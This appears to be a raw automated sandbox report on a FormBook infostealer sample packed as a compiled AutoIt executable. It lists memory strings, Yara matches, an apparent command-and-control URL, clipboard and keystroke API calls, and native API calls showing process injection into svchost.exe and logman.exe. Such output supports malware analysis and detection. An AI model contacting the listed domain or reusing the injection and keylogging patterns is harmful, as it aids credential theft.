Source: logman.exe, 00000005.00000003.2600123925.00000000078CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://delivery.consentmanager.net
Source: WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://dts.gnpge.com
Source: logman.exe, 00000005.00000003.2600123925.00000000078CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: logman.exe, 00000005.00000003.2600123925.00000000078CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: logman.exe, 00000005.00000003.2600123925.00000000078CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: logman.exe, 00000005.00000002.4503848678.0000000002BA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: logman.exe, 00000005.00000002.4503848678.0000000002BA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: logman.exe, 00000005.00000002.4503848678.0000000002BA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: logman.exe, 00000005.00000002.4503848678.0000000002B7F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: logman.exe, 00000005.00000002.4503848678.0000000002BA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: logman.exe, 00000005.00000002.4503848678.0000000002BA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: logman.exe, 00000005.00000003.2595229779.00000000078A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: logman.exe, 00000005.00000002.4505185726.0000000004DFC000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.00000000047DC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.axis138ae.shop/j2vs/?Bb6h7=gBiPvnrHa&V8=ojS/2P5nrhKWG869xfViz2uaiQ4dB6fmN9sQwMDG5q6PFmCk
Source: logman.exe, 00000005.00000003.2600123925.00000000078CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: logman.exe, 00000005.00000002.4505185726.00000000047B4000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004194000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: logman.exe, 00000005.00000003.2600123925.00000000078CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe

Code function: 0_2_00C84164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00C84164

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe

Code function: 0_2_00C84164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00C84164

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe

Code function: 0_2_00C83F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00C83F66

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe

Code function: 0_2_00C7001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00C7001C

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe

Code function: 0_2_00C9CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00C9CABC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4504489847.0000000002D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4506381463.0000000005550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4503536884.0000000002730000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4503787893.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2417007133.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2417341861.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4504631608.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2417817350.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00C13B3A
Source: NWPZbNcRxL.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: NWPZbNcRxL.exe, 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_40502ed8-6
Source: NWPZbNcRxL.exe, 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_8eb8d10c-6
Source: NWPZbNcRxL.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_eef076e4-4
Source: NWPZbNcRxL.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_09251231-3

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042C663 NtClose,	2_2_0042C663
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040AA54 NtDelayExecution,	2_2_0040AA54
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972B60 NtClose,LdrInitializeThunk,	2_2_03972B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03972DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039735C0 NtCreateMutant,LdrInitializeThunk,	2_2_039735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03974340 NtSetContextThread,	2_2_03974340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03974650 NtSuspendThread,	2_2_03974650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972B80 NtQueryInformationFile,	2_2_03972B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972BA0 NtEnumerateValueKey,	2_2_03972BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972BF0 NtAllocateVirtualMemory,	2_2_03972BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972BE0 NtQueryValueKey,	2_2_03972BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972AB0 NtWaitForSingleObject,	2_2_03972AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972AD0 NtReadFile,	2_2_03972AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972AF0 NtWriteFile,	2_2_03972AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972F90 NtProtectVirtualMemory,	2_2_03972F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972FB0 NtResumeThread,	2_2_03972FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972FA0 NtQuerySection,	2_2_03972FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972FE0 NtCreateFile,	2_2_03972FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972F30 NtCreateSection,	2_2_03972F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972F60 NtCreateProcessEx,	2_2_03972F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972E80 NtReadVirtualMemory,	2_2_03972E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972EA0 NtAdjustPrivilegesToken,	2_2_03972EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972EE0 NtQueueApcThread,	2_2_03972EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972E30 NtWriteVirtualMemory,	2_2_03972E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972DB0 NtEnumerateKey,	2_2_03972DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972DD0 NtDelayExecution,	2_2_03972DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972D10 NtMapViewOfSection,	2_2_03972D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972D00 NtSetInformationFile,	2_2_03972D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972D30 NtUnmapViewOfSection,	2_2_03972D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972CA0 NtQueryInformationToken,	2_2_03972CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972CC0 NtQueryVirtualMemory,	2_2_03972CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972CF0 NtOpenProcess,	2_2_03972CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972C00 NtQueryInformationProcess,	2_2_03972C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972C70 NtFreeVirtualMemory,	2_2_03972C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972C60 NtCreateKey,	2_2_03972C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03973090 NtSetValueKey,	2_2_03973090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03973010 NtOpenDirectoryObject,	2_2_03973010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039739B0 NtGetContextThread,	2_2_039739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03973D10 NtOpenProcessToken,	2_2_03973D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03973D70 NtOpenThread,	2_2_03973D70
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03184340 NtSetContextThread,LdrInitializeThunk,	5_2_03184340
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03184650 NtSuspendThread,LdrInitializeThunk,	5_2_03184650
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03182B60 NtClose,LdrInitializeThunk,	5_2_03182B60
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03182BA0 NtEnumerateValueKey,LdrInitializeThunk,	5_2_03182BA0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03182BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_03182BF0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03182BE0 NtQueryValueKey,LdrInitializeThunk,	5_2_03182BE0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03182AD0 NtReadFile,LdrInitializeThunk,	5_2_03182AD0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03182AF0 NtWriteFile,LdrInitializeThunk,	5_2_03182AF0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03182F30 NtCreateSection,LdrInitializeThunk,	5_2_03182F30
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03182FB0 NtResumeThread,LdrInitializeThunk,	5_2_03182FB0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03182FE0 NtCreateFile,LdrInitializeThunk,	5_2_03182FE0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03182E80 NtReadVirtualMemory,LdrInitializeThunk,	5_2_03182E80
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03182EE0 NtQueueApcThread,LdrInitializeThunk,	5_2_03182EE0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03182D10 NtMapViewOfSection,LdrInitializeThunk,	5_2_03182D10
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03182D30 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_03182D30
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03182DD0 NtDelayExecution,LdrInitializeThunk,	5_2_03182DD0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03182DF0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_03182DF0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03182C70 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_03182C70
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03182C60 NtCreateKey,LdrInitializeThunk,	5_2_03182C60
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03182CA0 NtQueryInformationToken,LdrInitializeThunk,	5_2_03182CA0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_031835C0 NtCreateMutant,LdrInitializeThunk,	5_2_031835C0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_031839B0 NtGetContextThread,LdrInitializeThunk,	5_2_031839B0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03182B80 NtQueryInformationFile,	5_2_03182B80
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03182AB0 NtWaitForSingleObject,	5_2_03182AB0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03182F60 NtCreateProcessEx,	5_2_03182F60
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03182F90 NtProtectVirtualMemory,	5_2_03182F90
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03182FA0 NtQuerySection,	5_2_03182FA0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03182E30 NtWriteVirtualMemory,	5_2_03182E30
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03182EA0 NtAdjustPrivilegesToken,	5_2_03182EA0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03182D00 NtSetInformationFile,	5_2_03182D00
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03182DB0 NtEnumerateKey,	5_2_03182DB0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03182C00 NtQueryInformationProcess,	5_2_03182C00
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03182CC0 NtQueryVirtualMemory,	5_2_03182CC0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03182CF0 NtOpenProcess,	5_2_03182CF0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03183010 NtOpenDirectoryObject,	5_2_03183010
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03183090 NtSetValueKey,	5_2_03183090
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03183D10 NtOpenProcessToken,	5_2_03183D10
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03183D70 NtOpenThread,	5_2_03183D70
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_02759340 NtReadFile,	5_2_02759340
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_027591D0 NtCreateFile,	5_2_027591D0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_02759630 NtAllocateVirtualMemory,	5_2_02759630
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_02759430 NtDeleteFile,	5_2_02759430
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_027594D0 NtClose,	5_2_027594D0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_02F6F2EB NtReadVirtualMemory,	5_2_02F6F2EB

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe

Code function: 0_2_00C7A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_00C7A1EF

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe

Code function: 0_2_00C68310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00C68310

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe

Code function: 0_2_00C751BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_00C751BD

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C3D975	0_2_00C3D975
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C321C5	0_2_00C321C5
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C462D2	0_2_00C462D2
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C903DA	0_2_00C903DA
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C4242E	0_2_00C4242E
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C325FA	0_2_00C325FA
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C266E1	0_2_00C266E1
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C1E6A0	0_2_00C1E6A0
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C6E616	0_2_00C6E616
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C4878F	0_2_00C4878F
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C78889	0_2_00C78889
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C46844	0_2_00C46844
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C90857	0_2_00C90857
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C28808	0_2_00C28808
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C3CB21	0_2_00C3CB21
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C46DB6	0_2_00C46DB6
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C26F9E	0_2_00C26F9E
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C23030	0_2_00C23030
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C3F1D9	0_2_00C3F1D9
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C33187	0_2_00C33187
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C11287	0_2_00C11287
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C31484	0_2_00C31484
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C25520	0_2_00C25520
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C37696	0_2_00C37696
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C25760	0_2_00C25760
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C31978	0_2_00C31978
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C49AB5	0_2_00C49AB5
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C1FCE0	0_2_00C1FCE0
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C97DDB	0_2_00C97DDB
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C31D90	0_2_00C31D90
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C3BDA6	0_2_00C3BDA6
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C23FE0	0_2_00C23FE0
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C1DF00	0_2_00C1DF00
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_010285E0	0_2_010285E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004185B3	2_2_004185B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E013	2_2_0040E013
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00410023	2_2_00410023
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E157	2_2_0040E157
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E163	2_2_0040E163
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402A50	2_2_00402A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401210	2_2_00401210
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401C20	2_2_00401C20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042EC93	2_2_0042EC93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FDFB	2_2_0040FDFB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FE03	2_2_0040FE03
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402F10	2_2_00402F10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004167B3	2_2_004167B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004167B2	2_2_004167B2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A003E6	2_2_03A003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394E3F0	2_2_0394E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039FA352	2_2_039FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C02C0	2_2_039C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E0274	2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A001AA	2_2_03A001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039F41A2	2_2_039F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039F81CC	2_2_039F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DA118	2_2_039DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03930100	2_2_03930100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C8158	2_2_039C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039D2000	2_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393C7C0	2_2_0393C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03964750	2_2_03964750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940770	2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395C6E0	2_2_0395C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A00591	2_2_03A00591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940535	2_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039EE4F6	2_2_039EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E4420	2_2_039E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039F2446	2_2_039F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039F6BD7	2_2_039F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039FAB40	2_2_039FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393EA80	2_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A0A9A6	2_2_03A0A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039429A0	2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03956962	2_2_03956962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039268B8	2_2_039268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396E8F0	2_2_0396E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394A840	2_2_0394A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03942840	2_2_03942840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039BEFA0	2_2_039BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03932FC8	2_2_03932FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394CFE0	2_2_0394CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03960F30	2_2_03960F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E2F30	2_2_039E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03982F28	2_2_03982F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B4F40	2_2_039B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03952E90	2_2_03952E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039FCE93	2_2_039FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039FEEDB	2_2_039FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393AE0D	2_2_0393AE0D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039FEE26	2_2_039FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940E59	2_2_03940E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03958DBF	2_2_03958DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DCD1F	2_2_039DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394AD00	2_2_0394AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E0CB5	2_2_039E0CB5
